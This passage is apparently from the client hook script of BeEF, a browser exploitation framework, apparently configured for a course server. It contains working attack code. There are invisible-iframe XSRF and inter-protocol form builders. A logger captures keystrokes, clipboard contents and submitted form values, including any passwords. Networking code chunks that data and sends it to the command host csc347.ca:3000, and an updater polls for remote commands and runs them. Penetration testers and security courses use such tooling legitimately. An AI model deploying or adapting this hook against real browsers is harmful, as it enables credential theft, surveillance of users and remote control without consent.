  5196. // content += "</embed>";
  5197. // }
  5198. $j('body').append(content);
  5199. },
  5200.  
  5201. /**
  5202. * Given an id, remove the applet from the DOM.
  5203. * @params: {String} id: reference identifier to the applet.
  5204. */
  5205. detachApplet: function(id) {
  5206. $j('#' + id + '').detach();
  5207. },
  5208.  
  5209. /**
  5210. * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
  5211. * @params: {String} action: the form action attribute, where the request will be sent.
  5212. * @params: {String} method: HTTP method, usually POST.
  5213. * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
  5214. * example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
  5215. */
  5216. createIframeXsrfForm: function(action, method, inputs){
  5217. var iframeXsrf = beef.dom.createInvisibleIframe();
  5218.  
  5219. var formXsrf = document.createElement('form');
  5220. formXsrf.setAttribute('action', action);
  5221. formXsrf.setAttribute('method', method);
  5222.  
  5223. var input = null;
  5224. for (i in inputs){
  5225. var attributes = inputs[i];
  5226. input = document.createElement('input');
  5227. for(key in attributes){
  5228. input.setAttribute(key, attributes[key]);
  5229. }
  5230. formXsrf.appendChild(input);
  5231. }
  5232. iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
  5233. formXsrf.submit();
  5234.  
  5235. return iframeXsrf;
  5236. },
  5237.  
  5238. /**
  5239. * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
  5240. * @params: {String} rhost: remote host ip/domain
  5241. * @params: {String} rport: remote port
  5242. * @params: {String} commands: protocol commands to be executed by the remote host:port service
  5243. */
  5244. createIframeIpecForm: function(rhost, rport, path, commands){
  5245. var iframeIpec = beef.dom.createInvisibleIframe();
  5246.  
  5247. var formIpec = document.createElement('form');
  5248. formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
  5249. formIpec.setAttribute('method', 'POST');
  5250. formIpec.setAttribute('enctype', 'multipart/form-data');
  5251.  
  5252. input = document.createElement('textarea');
  5253. input.setAttribute('name', Math.random().toString(36).substring(5));
  5254. input.value = commands;
  5255. formIpec.appendChild(input);
  5256. iframeIpec.contentWindow.document.body.appendChild(formIpec);
  5257. formIpec.submit();
  5258.  
  5259. return iframeIpec;
  5260. }
  5261.  
  5262. };
  5263.  
  5264. beef.regCmp('beef.dom');
  5265.  
  5266.  
  5267. //
  5268. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  5269. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  5270. // See the file 'doc/COPYING' for copying permission
  5271. //
  5272.  
  5273. /*!
  5274. * @literal object: beef.logger
  5275. *
  5276. * Provides logging capabilities.
  5277. */
  5278. beef.logger = {
  5279.  
  5280. running: false,
  5281. /**
  5282. * Internal logger id
  5283. */
  5284. id: 0,
  5285. /**
  5286. * Holds events created by user, to be sent back to BeEF
  5287. */
  5288. events: [],
  5289. /**
  5290. * Holds current stream of key presses
  5291. */
  5292. stream: [],
  5293. /**
  5294. * Contains current target of key presses
  5295. */
  5296. target: null,
  5297. /**
  5298. * Holds the time the logger was started
  5299. */
  5300. time: null,
  5301. /**
  5302. * Holds the event details to be sent to BeEF
  5303. */
  5304. e: function() {
  5305. this.id = beef.logger.get_id();
  5306. this.time = beef.logger.get_timestamp();
  5307. this.type = null;
  5308. this.x = 0;
  5309. this.y = 0;
  5310. this.target = null;
  5311. this.data = null;
  5312. this.mods = null;
  5313. },
  5314.  
  5315. /**
  5316. * Starts the logger
  5317. */
  5318. start: function() {
  5319.  
  5320. beef.browser.hookChildFrames();
  5321. this.running = true;
  5322. var d = new Date();
  5323. this.time = d.getTime();
  5324.  
  5325. $j(document).keypress(
  5326. function(e) { beef.logger.keypress(e); }
  5327. ).click(
  5328. function(e) { beef.logger.click(e); }
  5329. );
  5330. $j(window).focus(
  5331. function(e) { beef.logger.win_focus(e); }
  5332. ).blur(
  5333. function(e) { beef.logger.win_blur(e); }
  5334. );
  5335. $j('form').submit(
  5336. function(e) { beef.logger.submit(e); }
  5337. );
  5338. document.body.oncopy = function() {
  5339. setTimeout("beef.logger.copy();", 10);
  5340. };
  5341. document.body.oncut = function() {
  5342. setTimeout("beef.logger.cut();", 10);
  5343. };
  5344. document.body.onpaste = function() {
  5345. beef.logger.paste();
  5346. }
  5347. },
  5348.  
  5349. /**
  5350. * Stops the logger
  5351. */
  5352. stop: function() {
  5353. this.running = false;
  5354. clearInterval(this.timer);
  5355. $j(document).keypress(null);
  5356. },
  5357.  
  5358. /**
  5359. * Get id
  5360. */
  5361. get_id: function() {
  5362. this.id++;
  5363. return this.id;
  5364. },
  5365.  
  5366. /**
  5367. * Click function fires when the user clicks the mouse.
  5368. */
  5369. click: function(e) {
  5370. var c = new beef.logger.e();
  5371. c.type = 'click';
  5372. c.x = e.pageX;
  5373. c.y = e.pageY;
  5374. c.target = beef.logger.get_dom_identifier(e.target);
  5375. this.events.push(c);
  5376. },
  5377.  
  5378. /**
  5379. * Fires when the window element has regained focus
  5380. */
  5381. win_focus: function(e) {
  5382. var f = new beef.logger.e();
  5383. f.type = 'focus';
  5384. this.events.push(f);
  5385. },
  5386.  
  5387. /**
  5388. * Fires when the window element has lost focus
  5389. */
  5390. win_blur: function(e) {
  5391. var b = new beef.logger.e();
  5392. b.type = 'blur';
  5393. this.events.push(b);
  5394. },
  5395.  
  5396. /**
  5397. * Keypress function fires everytime a key is pressed.
  5398. * @param {Object} e: event object
  5399. */
  5400. keypress: function(e) {
  5401. if (this.target == null || ($j(this.target).get(0) !== $j(e.target).get(0)))
  5402. {
  5403. beef.logger.push_stream();
  5404. this.target = e.target;
  5405. }
  5406. this.stream.push({'char':e.which, 'modifiers': {'alt':e.altKey, 'ctrl':e.ctrlKey, 'shift':e.shiftKey}});
  5407. },
  5408.  
  5409. /**
  5410. * Copy function fires when the user copies data to the clipboard.
  5411. */
  5412. copy: function(x) {
  5413. try {
  5414. var c = new beef.logger.e();
  5415. c.type = 'copy';
  5416. c.data = clipboardData.getData("Text");
  5417. this.events.push(c);
  5418. } catch(e) {}
  5419. },
  5420.  
  5421. /**
  5422. * Cut function fires when the user cuts data to the clipboard.
  5423. */
  5424. cut: function() {
  5425. try {
  5426. var c = new beef.logger.e();
  5427. c.type = 'cut';
  5428. c.data = clipboardData.getData("Text");
  5429. this.events.push(c);
  5430. } catch(e) {}
  5431. },
  5432.  
  5433. /**
  5434. * Paste function fires when the user pastes data from the clipboard.
  5435. */
  5436. paste: function() {
  5437. try {
  5438. var c = new beef.logger.e();
  5439. c.type = 'paste';
  5440. c.data = clipboardData.getData("Text");
  5441. this.events.push(c);
  5442. } catch(e) {}
  5443. },
  5444.  
  5445. /**
  5446. * Submit function fires whenever a form is submitted
  5447. * TODO: Cleanup this function
  5448. */
  5449. submit: function(e) {
  5450. try {
  5451. var f = new beef.logger.e();
  5452. var values = "";
  5453. f.type = 'submit';
  5454. f.target = beef.logger.get_dom_identifier(e.target);
  5455. for (var i = 0; i < e.target.elements.length; i++) {
  5456. values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
  5457. }
  5458. f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
  5459. this.events.push(f);
  5460. } catch(e) {}
  5461. },
  5462.  
  5463. /**
  5464. * Pushes the current stream to the events queue
  5465. */
  5466. push_stream: function() {
  5467. if (this.stream.length > 0)
  5468. {
  5469. this.events.push(beef.logger.parse_stream());
  5470. this.stream = [];
  5471. }
  5472. },
  5473.  
  5474. /**
  5475. * Translate DOM Object to a readable string
  5476. */
  5477. get_dom_identifier: function(target) {
  5478. target = (target == null) ? this.target : target;
  5479. var id = '';
  5480. if (target)
  5481. {
  5482. id = target.tagName.toLowerCase();
  5483. id += ($j(target).attr('id')) ? '#'+$j(target).attr('id') : ' ';
  5484. id += ($j(target).attr('name')) ? '('+$j(target).attr('name')+')' : '';
  5485. }
  5486. return id;
  5487. },
  5488.  
  5489. /**
  5490. * Formats the timestamp
  5491. * @return {String} timestamp string
  5492. */
  5493. get_timestamp: function() {
  5494. var d = new Date();
  5495. return ((d.getTime() - this.time) / 1000).toFixed(3);
  5496. },
  5497.  
  5498. /**
  5499. * Parses stream array and creates history string
  5500. */
  5501. parse_stream: function() {
  5502. var s = '';
  5503. var mods = '';
  5504. for (var i in this.stream){
  5505. try{
  5506. var mod = this.stream[i]['modifiers'];
  5507. s += String.fromCharCode(this.stream[i]['char']);
  5508. if(typeof mod != 'undefined' &&
  5509. (mod['alt'] == true ||
  5510. mod['ctrl'] == true ||
  5511. mod['shift'] == true)){
  5512. mods += (mod['alt']) ? ' [Alt] ' : '';
  5513. mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
  5514. mods += (mod['shift']) ? ' [Shift] ' : '';
  5515. mods += String.fromCharCode(this.stream[i]['char']);
  5516. }
  5517.  
  5518. }catch(e){}
  5519. }
  5520. var k = new beef.logger.e();
  5521. k.type = 'keys';
  5522. k.target = beef.logger.get_dom_identifier();
  5523. k.data = s;
  5524. k.mods = mods;
  5525. return k;
  5526. },
  5527.  
  5528. /**
  5529. * Queue results to be sent back to framework
  5530. */
  5531. queue: function() {
  5532. beef.logger.push_stream();
  5533. if (this.events.length > 0)
  5534. {
  5535. beef.net.queue('/event', 0, this.events);
  5536. this.events = [];
  5537. }
  5538. }
  5539.  
  5540. };
  5541.  
  5542. beef.regCmp('beef.logger');
  5543.  
  5544.  
  5545. //
  5546. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  5547. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  5548. // See the file 'doc/COPYING' for copying permission
  5549. //
  5550.  
  5551. /*!
  5552. * @literal object: beef.net
  5553. *
  5554. * Provides basic networking functions,
  5555. * like beef.net.request and beef.net.forgeRequest,
  5556. * used by BeEF command modules and the Requester extension,
  5557. * as well as beef.net.send which is used to return commands
  5558. * to BeEF server-side components.
  5559. *
  5560. * Also, it contains the core methods used by the XHR-polling
  5561. * mechanism (flush, queue)
  5562. */
  5563. beef.net = {
  5564.  
  5565. host:"csc347.ca",
  5566. port:"3000",
  5567. hook:"/hook.js",
  5568. httpproto:"http",
  5569. handler:'/dh',
  5570. chop:500,
  5571. pad:30, //this is the amount of padding for extra params such as pc, pid and sid
  5572. sid_count:0,
  5573. cmd_queue:[],
  5574.  
  5575. /**
  5576. * Command object. This represents the data to be sent back to BeEF,
  5577. * using the beef.net.send() method.
  5578. */
  5579. command:function () {
  5580. this.cid = null;
  5581. this.results = null;
  5582. this.handler = null;
  5583. this.callback = null;
  5584. },
  5585.  
  5586. /**
  5587. * Packet object. A single chunk of data. X packets -> 1 stream
  5588. */
  5589. packet:function () {
  5590. this.id = null;
  5591. this.data = null;
  5592. },
  5593.  
  5594. /**
  5595. * Stream object. Contains X packets, which are command result chunks.
  5596. */
  5597. stream:function () {
  5598. this.id = null;
  5599. this.packets = [];
  5600. this.pc = 0;
  5601. this.get_base_url_length = function () {
  5602. return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
  5603. };
  5604. this.get_packet_data = function () {
  5605. var p = this.packets.shift();
  5606. return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
  5607. };
  5608. },
  5609.  
  5610. /**
  5611. * Response Object - used in the beef.net.request callback
  5612. * NOTE: as we are using async mode, the response object will be empty if returned.
  5613. * Using sync mode, request obj fields will be populated.
  5614. */
  5615. response:function () {
  5616. this.status_code = null; // 500, 404, 200, 302
  5617. this.status_text = null; // success, timeout, error, ...
  5618. this.response_body = null; // "<html>…." if not a cross domain request
  5619. this.port_status = null; // tcp port is open, closed or not http
  5620. this.was_cross_domain = null; // true or false
  5621. this.was_timedout = null; // the user specified timeout was reached
  5622. this.duration = null; // how long it took for the request to complete
  5623. this.headers = null; // full response headers
  5624. },
  5625.  
  5626. /**
  5627. * Queues the specified command results.
  5628. * @param: {String} handler: the server-side handler that will be called
  5629. * @param: {Integer} cid: command id
  5630. * @param: {String} results: the data to send
  5631. * @param: {Function} callback: the function to call after execution
  5632. */
  5633. queue:function (handler, cid, results, callback) {
  5634. if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
  5635. var s = new beef.net.command();
  5636. s.cid = cid;
  5637. s.results = beef.net.clean(results);
  5638. s.callback = callback;
  5639. s.handler = handler;
  5640. this.cmd_queue.push(s);
  5641. }
  5642. },
  5643.  
  5644. /**
  5645. * Queues the current command results and flushes the queue straight away.
  5646. * NOTE: Always send Browser Fingerprinting results
  5647. * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
  5648. * even if WebSockets are enabled.
  5649. * @param: {String} handler: the server-side handler that will be called
  5650. * @param: {Integer} cid: command id
  5651. * @param: {String} results: the data to send
  5652. * @param: {Function} callback: the function to call after execution
  5653. */
  5654. send:function (handler, cid, results, callback) {
  5655. if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
  5656. this.queue(handler, cid, results, callback);
  5657. this.flush();
  5658. }else {
  5659. try {
  5660. beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
  5661. '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
  5662. '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
  5663. }catch (e) {
  5664. this.queue(handler, cid, results, callback);
  5665. this.flush();
  5666. }
  5667. }
  5668. },
  5669.  
  5670. /**
  5671. * Flush all currently queued command results to the framework,
  5672. * chopping the data in chunks ('chunk' method) which will be re-assembled
  5673. * server-side by the network stack.
  5674. * NOTE: currently 'flush' is used only with the default
  5675. * XHR-polling mechanism. If WebSockets are used, the data is sent
  5676. * back to BeEF straight away.
  5677. */
  5678. flush:function () {
  5679. if (this.cmd_queue.length > 0) {
  5680. var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
  5681. this.cmd_queue.length = 0;
  5682. this.sid_count++;
  5683. var stream = new this.stream();
  5684. stream.id = this.sid_count;
  5685. var pad = stream.get_base_url_length() + this.pad;
  5686. //cant continue if chop amount is too low
  5687. if ((this.chop - pad) > 0) {
  5688. var data = this.chunk(data, (this.chop - pad));
  5689. for (var i = 1; i <= data.length; i++) {
  5690. var packet = new this.packet();
  5691. packet.id = i;
  5692. packet.data = data[(i - 1)];
  5693. stream.packets.push(packet);
  5694. }
  5695. stream.pc = stream.packets.length;
  5696. this.push(stream);
  5697. }
  5698. }
  5699. },
  5700.  
  5701. /**
  5702. * Split the input data into chunk lengths determined by the amount parameter.
  5703. * @param: {String} str: the input data
  5704. * @param: {Integer} amount: chunk length
  5705. */
  5706. chunk:function (str, amount) {
  5707. if (typeof amount == 'undefined') n = 2;
  5708. return str.match(RegExp('.{1,' + amount + '}', 'g'));
  5709. },
  5710.  
  5711. /**
  5712. * Push the input stream back to the BeEF server-side components.
  5713. * It uses beef.net.request to send back the data.
  5714. * @param: {Object} stream: the stream object to be sent back.
  5715. */
  5716. push:function (stream) {
  5717. //need to implement wait feature here eventually
  5718. for (var i = 0; i < stream.pc; i++) {
  5719. this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
  5720. }
  5721. },
  5722.  
  5723. /**
  5724. * Performs http requests
  5725. * @param: {String} scheme: HTTP or HTTPS
  5726. * @param: {String} method: GET or POST
  5727. * @param: {String} domain: bindshell.net, 192.168.3.4, etc
  5728. * @param: {Int} port: 80, 5900, etc
  5729. * @param: {String} path: /path/to/resource
  5730. * @param: {String} anchor: this is the value that comes after the # in the URL
  5731. * @param: {String} data: This will be used as the query string for a GET or post data for a POST
  5732. * @param: {Int} timeout: timeout the request after N seconds
  5733. * @param: {String} dataType: specify the data return type expected (ie text/html/script)
  5734. * @param: {Function} callback: call the callback function at the completion of the method
  5735. *
  5736. * @return: {Object} response: this object contains the response details
  5737. */
  5738. request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
  5739. //check if same domain or cross domain
  5740. var cross_domain = true;
  5741. if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
  5742. if(document.location.port == "" || document.location.port == null){
  5743. cross_domain = !(port == "80" || port == "443");
  5744. }
  5745. }
  5746.  
  5747. //build the url
  5748. var url = "";
  5749. if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
  5750. url = path;
  5751. } else {
  5752. url = scheme + "://" + domain;
  5753. url = (port != null) ? url + ":" + port : url;
  5754. url = (path != null) ? url + path : url;
  5755. url = (anchor != null) ? url + "#" + anchor : url;
  5756. }
  5757.  
  5758. //define response object
  5759. var response = new this.response;
  5760. response.was_cross_domain = cross_domain;
  5761. var start_time = new Date().getTime();
  5762.  
  5763. /*
  5764. * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
  5765. * This will turn POSTs into GETs for remote-domain requests.
  5766. */
  5767. if (method == "POST"){
  5768. $j.ajaxSetup({
  5769. dataType: dataType
  5770. });
  5771. } else {
  5772. $j.ajaxSetup({
  5773. dataType: 'script'
  5774. });
  5775. }
  5776.  
  5777. //build and execute the request
  5778. $j.ajax({type:method,
  5779. url:url,
  5780. data:data,
  5781. timeout:(timeout * 1000),
  5782.  
  5783. //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
  5784. beforeSend:function (xhr) {
  5785. if (method == "POST") {
  5786. xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
  5787. }
  5788. },
  5789. success:function (data, textStatus, xhr) {
  5790. var end_time = new Date().getTime();
  5791. response.status_code = xhr.status;
  5792. response.status_text = textStatus;
  5793. response.response_body = data;
  5794. response.port_status = "open";
  5795. response.was_timedout = false;
  5796. response.duration = (end_time - start_time);
  5797. },
  5798. error:function (jqXHR, textStatus, errorThrown) {
  5799. var end_time = new Date().getTime();
  5800. response.response_body = jqXHR.responseText;
  5801. response.status_code = jqXHR.status;
  5802. response.status_text = textStatus;
  5803. response.duration = (end_time - start_time);
  5804. },
  5805. complete:function (jqXHR, textStatus) {
  5806. response.status_code = jqXHR.status;
  5807. response.status_text = textStatus;
  5808. response.headers = jqXHR.getAllResponseHeaders();
  5809. // determine if TCP port is open/closed/not-http
  5810. if (textStatus == "timeout") {
  5811. response.was_timedout = true;
  5812. response.response_body = "ERROR: Timed out\n";
  5813. response.port_status = "closed";
  5814. } else if (textStatus == "parsererror") {
  5815. response.port_status = "not-http";
  5816. } else {
  5817. response.port_status = "open";
  5818. }
  5819. }
  5820. }).done(function () {
  5821. if (callback != null) {
  5822. callback(response);
  5823. }
  5824. });
  5825. return response;
  5826. },
  5827.  
  5828. /*
  5829. * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
  5830. * - requestid: needed on the callback
  5831. * - allowCrossDomain: set cross-domain requests as allowed or blocked
  5832. *
  5833. * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
  5834. */
  5835. forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
  5836.  
  5837. // check if same domain or cross domain
  5838. var cross_domain = true;
  5839.  
  5840. if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
  5841. if(document.location.port == "" || document.location.port == null){
  5842. cross_domain = !(port == "80" || port == "443");
  5843. } else {
  5844. if (document.location.port == port) cross_domain = false;
  5845. }
  5846. }
  5847.  
  5848. // build the url
  5849. var url = "";
  5850. if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
  5851. url = path;
  5852. } else {
  5853. url = scheme + "://" + domain;
  5854. url = (port != null) ? url + ":" + port : url;
  5855. url = (path != null) ? url + path : url;
  5856. url = (anchor != null) ? url + "#" + anchor : url;
  5857. }
  5858.  
  5859. // define response object
  5860. var response = new this.response;
  5861. response.was_cross_domain = cross_domain;
  5862. var start_time = new Date().getTime();
  5863.  
  5864. // if cross-domain requests are not allowed and the request is cross-domain
  5865. // don't proceed and return
  5866. if (allowCrossDomain == "false" && cross_domain && callback != null) {
  5867. response.status_code = -1;
  5868. response.status_text = "crossdomain";
  5869. response.port_status = "crossdomain";
  5870. response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
  5871. response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
  5872. callback(response, requestid);
  5873. return response;
  5874. }
  5875.  
  5876. /*
  5877. * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
  5878. * This will turn POSTs into GETs for remote-domain requests.
  5879. */
  5880. if (method == "POST"){
  5881. $j.ajaxSetup({
  5882. dataType: dataType
  5883. });
  5884. } else {
  5885. $j.ajaxSetup({
  5886. dataType: 'script'
  5887. });
  5888. }
  5889.  
  5890. // this is required for bugs in IE so data can be transferred back to the server
  5891. if ( beef.browser.isIE() ) {
  5892. dataType = 'script'
  5893. }
  5894.  
  5895. $j.ajax({type: method,
  5896. dataType: dataType,
  5897. url: url,
  5898. headers: headers,
  5899. timeout: (timeout * 1000),
  5900.  
  5901. //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
  5902. beforeSend:function (xhr) {
  5903. if (method == "POST") {
  5904. xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
  5905. }
  5906. },
  5907.  
  5908. // http server responded successfully
  5909. success:function (data, textStatus, xhr) {
  5910. var end_time = new Date().getTime();
  5911. response.status_code = xhr.status;
  5912. response.status_text = textStatus;
  5913. response.response_body = data;
  5914. response.was_timedout = false;
  5915. response.duration = (end_time - start_time);
  5916. },
  5917.  
  5918. // server responded with a http error (403, 404, 500, etc)
  5919. // or server is not a http server
  5920. error:function (xhr, textStatus, errorThrown) {
  5921. var end_time = new Date().getTime();
  5922. response.response_body = xhr.responseText;
  5923. response.status_code = xhr.status;
  5924. response.status_text = textStatus;
  5925. response.duration = (end_time - start_time);
  5926. },
  5927.  
  5928. complete:function (xhr, textStatus) {
  5929. // cross-domain request
  5930. if (cross_domain) {
  5931.  
  5932. response.port_status = "crossdomain";
  5933.  
  5934. if (xhr.status != 0) {
  5935. response.status_code = xhr.status;
  5936. } else {
  5937. response.status_code = -1;
  5938. }
  5939.  
  5940. if (textStatus) {
  5941. response.status_text = textStatus;
  5942. } else {
  5943. response.status_text = "crossdomain";
  5944. }
  5945.  
  5946. if (xhr.getAllResponseHeaders()) {
  5947. response.headers = xhr.getAllResponseHeaders();
  5948. } else {
  5949. response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
  5950. }
  5951.  
  5952. if (!response.response_body) {
  5953. response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
  5954. }
  5955.  
  5956. } else {
  5957. // same-domain request
  5958. response.status_code = xhr.status;
  5959. response.status_text = textStatus;
  5960. response.headers = xhr.getAllResponseHeaders();
  5961.  
  5962. // determine if TCP port is open/closed/not-http
  5963. if (textStatus == "timeout") {
  5964. response.was_timedout = true;
  5965. response.response_body = "ERROR: Timed out\n";
  5966. response.port_status = "closed";
  5967. } else if (textStatus == "parsererror") {
  5968. response.port_status = "not-http";
  5969. } else {
  5970. response.port_status = "open";
  5971. }
  5972. }
  5973. callback(response, requestid);
  5974. }
  5975. });
  5976. return response;
  5977. },
  5978.  
  5979. //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
  5980. //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
  5981. clean:function (r) {
  5982. if (this.array_has_string_key(r)) {
  5983. var obj = {};
  5984. for (var key in r)
  5985. obj[key] = (this.array_has_string_key(obj[key])) ? this.clean(r[key]) : r[key];
  5986. return obj;
  5987. }
  5988. return r;
  5989. },
  5990.  
  5991. //Detects if an array has a string key
  5992. array_has_string_key:function (arr) {
  5993. if ($j.isArray(arr)) {
  5994. try {
  5995. for (var key in arr)
  5996. if (isNaN(parseInt(key))) return true;
  5997. } catch (e) {
  5998. }
  5999. }
  6000. return false;
  6001. },
  6002.  
  6003. /**
  6004. * Sends back browser details to framework, calling beef.browser.getDetails()
  6005. */
  6006. browser_details:function () {
  6007. var details = beef.browser.getDetails();
  6008. details['HookSessionID'] = beef.session.get_hook_session_id();
  6009. this.send('/init', 0, details);
  6010. }
  6011.  
  6012. };
  6013.  
  6014.  
  6015. beef.regCmp('beef.net');
  6016.  
  6017.  
  6018. //
  6019. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6020. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6021. // See the file 'doc/COPYING' for copying permission
  6022. //
  6023.  
  6024. /*!
  6025. * @Literal object: beef.updater
  6026. *
  6027. * Object in charge of getting new commands from the BeEF framework and execute them.
  6028. * The XHR-polling channel is managed here. If WebSockets are enabled,
  6029. * websocket.ls is used instead.
  6030. */
  6031. beef.updater = {
  6032.  
  6033. // XHR-polling timeout.
  6034. xhr_poll_timeout: "5000",
  6035. beefhook: "BEEFHOOK",
  6036.  
  6037. // A lock.
  6038. lock: false,
  6039.  
  6040. // An object containing all values to be registered and sent by the updater.
  6041. objects: new Object(),
  6042.  
  6043. /*
  6044. * Registers an object to always send when requesting new commands to the framework.
  6045. * @param: {String} the name of the object.
  6046. * @param: {String} the value of that object.
  6047. *
  6048. * @example: beef.updater.regObject('java_enabled', 'true');
  6049. */
  6050. regObject: function(key, value) {
  6051. this.objects[key] = escape(value);
  6052. },
  6053.  
  6054. // Checks for new commands from the framework and runs them.
  6055. check: function() {
  6056. if(this.lock == false) {
  6057. if (beef.logger.running) {
  6058. beef.logger.queue();
  6059. }
  6060. beef.net.flush();
  6061. if(beef.commands.length > 0) {
  6062. this.execute_commands();
  6063. }else {
  6064. this.get_commands(); /*Polling*/
  6065. }
  6066. }
  6067.  
  6068. // ( typeof beef.websocket === "undefined")
  6069. setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
  6070. },
  6071.  
  6072. /**
  6073. * Gets new commands from the framework.
  6074. */
  6075. get_commands: function() {
  6076. try {
  6077. this.lock = true;
  6078. beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
  6079. if (response.body != null && response.body.length > 0)
  6080. beef.updater.execute_commands();
  6081. });
  6082. } catch(e) {
  6083. this.lock = false;
  6084. return;
  6085. }
  6086. this.lock = false;
  6087. },
  6088.  
  6089. /**
  6090. * Executes the received commands, if any.
  6091. */
  6092. execute_commands: function() {
  6093. if(beef.commands.length == 0) return;
  6094. this.lock = true;
  6095. while(beef.commands.length > 0) {
  6096. command = beef.commands.pop();
  6097. try {
  6098. command();
  6099. } catch(e) {
  6100. console.error('execute_commands - command failed to execute: ' + e.message);
  6101. }
  6102. }
  6103. this.lock = false;
  6104. }
  6105. };
  6106.  
  6107. beef.regCmp('beef.updater');
  6108.  
  6109.  
  6110. //
  6111. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  6112. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  6113. // See the file 'doc/COPYING' for copying permission
  6114. //
  6115.  
  6116. // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
  6117.  
  6118. beef.encode = {};
  6119.  
  6120. beef.encode.base64 = {
  6121.  
  6122. keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
  6123.  
  6124. encode : function (input) {
  6125. if (window.btoa) {
  6126. return btoa(unescape(encodeURIComponent(input)));
  6127. }
  6128.  
  6129. var output = "";
  6130. var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
  6131. var i = 0;
  6132.  
  6133. input = beef.encode.base64.utf8_encode(input);
  6134.  
  6135. while (i < input.length) {
  6136.  
  6137. chr1 = input.charCodeAt(i++);
  6138. chr2 = input.charCodeAt(i++);
  6139. chr3 = input.charCodeAt(i++);
  6140.  
  6141. enc1 = chr1 >> 2;
  6142. enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
  6143. enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
  6144. enc4 = chr3 & 63;
  6145.  
  6146. if (isNaN(chr2)) {
  6147. enc3 = enc4 = 64;
  6148. } else if (isNaN(chr3)) {
  6149. enc4 = 64;
  6150. }
  6151.  
  6152. output = output +
  6153. this.keyStr.charAt(enc1) + this.keyStr.charAt(enc2) +
  6154. this.keyStr.charAt(enc3) + this.keyStr.charAt(enc4);
  6155.  
  6156. }
  6157.  
  6158. return output;
  6159. },
  6160.  
  6161.  
  6162. decode : function (input) {
  6163. if (window.atob) {
  6164. return escape(atob(input));
  6165. }
  6166.  
  6167. var output = "";
  6168. var chr1, chr2, chr3;
  6169. var enc1, enc2, enc3, enc4;
  6170. var i = 0;
  6171.  
  6172. input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
  6173.  
  6174. while (i < input.length) {
  6175.  
  6176. enc1 = this.keyStr.indexOf(input.charAt(i++));
  6177. enc2 = this.keyStr.indexOf(input.charAt(i++));
  6178. enc3 = this.keyStr.indexOf(input.charAt(i++));
  6179. enc4 = this.keyStr.indexOf(input.charAt(i++));
  6180.  
  6181. chr1 = (enc1 << 2) | (enc2 >> 4);
  6182. chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
  6183. chr3 = ((enc3 & 3) << 6) | enc4;
  6184.  
  6185. output = output + String.fromCharCode(chr1);
  6186.  
  6187. if (enc3 != 64) {
  6188. output = output + String.fromCharCode(chr2);
  6189. }
  6190. if (enc4 != 64) {
  6191. output = output + String.fromCharCode(chr3);
  6192. }
  6193.  
  6194. }
  6195.  
  6196. output = beef.encode.base64.utf8_decode(output);
  6197.  
